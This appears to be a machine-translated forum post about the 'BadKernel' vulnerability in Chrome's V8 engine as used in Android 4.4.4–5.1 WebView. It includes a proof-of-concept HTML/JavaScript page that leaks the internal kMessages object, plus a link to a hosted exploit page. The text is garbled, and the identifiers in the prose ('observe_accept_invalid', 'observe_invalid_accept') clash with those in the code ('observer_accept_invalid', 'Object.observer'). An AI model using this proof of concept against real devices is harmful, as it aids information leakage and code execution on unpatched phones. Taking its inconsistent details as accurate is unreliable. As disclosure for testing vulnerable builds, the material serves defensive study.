| View unanswered posts | View active topics |
It is currently Thu Jul 20, 2017 2:35 pm |
|
All times are UTC |
|
Page 1 of 1 |
[ 1 post ] |
| Print view | Previous topic | First unread post | Next topic |
Google Chrome V8 BadKernel Vulnerability
| Author | Message |
|---|---|
 Joined: Sun Jul 24, 2016 12:11 pm Posts: 12 
|
 Google V8 JavaScript Engine is Chrome browser for the development of a set of open source JavaScript engine.
The vulnerability is due to the source code in the "observe_accept_invalid" exception type was mistakenly written as "observe_invalid_accept"". An attacker can use the vulnerability to cause kMessages key object information leakage, the implementation of arbitrary code. Based on the 4.4.4 Android to 5.1 version of the system WebView controls the development of mobile phone APP are likely to be affected by the vulnerability. Google Chrome V8 : 3.20 ~ 4.2 Version Android: 4.4.4 ~ 5.1 Version Code: Proof of Concept <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>badkernel</title> </head> <script type="text/javascript"> var kMessages; Object.prototype.__defineGetter__("observer_accept_invalid", function(){kMessages=this}); try{ Object.observer({},function(){}, 1); } catch(e) { } delete Object.prototype["observer_accept_invalid"]; alert(kMessages); </script> </html> Or http://poc.hackertop.org/Android/v8rce_poc.html If the browser can access the following page, if you can get the kMessages object, Output object name is vulnerability If output undefined does't vulnerability. chrome://version Refer: http://www.cnnvd.org.cn/vulnerability/s ... 2016080414 |
| Tue Aug 23, 2016 11:14 am |
|
|
|
|
|
Page 1 of 1 |
[ 1 post ] |
|
All times are UTC |
| You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot post attachments in this forum |